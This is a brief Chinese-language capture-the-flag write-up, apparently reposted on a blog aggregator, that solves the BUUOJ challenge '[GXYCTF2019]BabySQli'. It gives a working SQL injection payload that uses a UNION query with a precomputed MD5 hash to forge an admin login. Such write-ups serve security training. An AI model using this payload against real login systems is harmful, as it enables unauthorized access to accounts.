https://buuoj.cn/challenges#[GXYCTF2019]BabySQli
登陸類注入,有過濾
這是一段base32解碼后是base64再解一次得到
select * from user where username = '$name'
Trick
- 使用聯合查詢構造虛擬查詢記錄進行登錄
這里有個小坑,原題應該是有對密碼進行了md5加密后存盤的,但是這里沒有提示
PS C:\Users\Administrator> php -r "var_dump(md5('mochu7'));"
string(32) "874a0300d72a3676c4413ce52454eff7"
name=mochu7'union select 1,'admin','874a0300d72a3676c4413ce52454eff7'#&pw=mochu7
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/208546.html
標籤:其他
上一篇:JWT,springboot整合JWT完成token的驗證,token的使用,token做介面攔截
下一篇:販賣快樂的圖片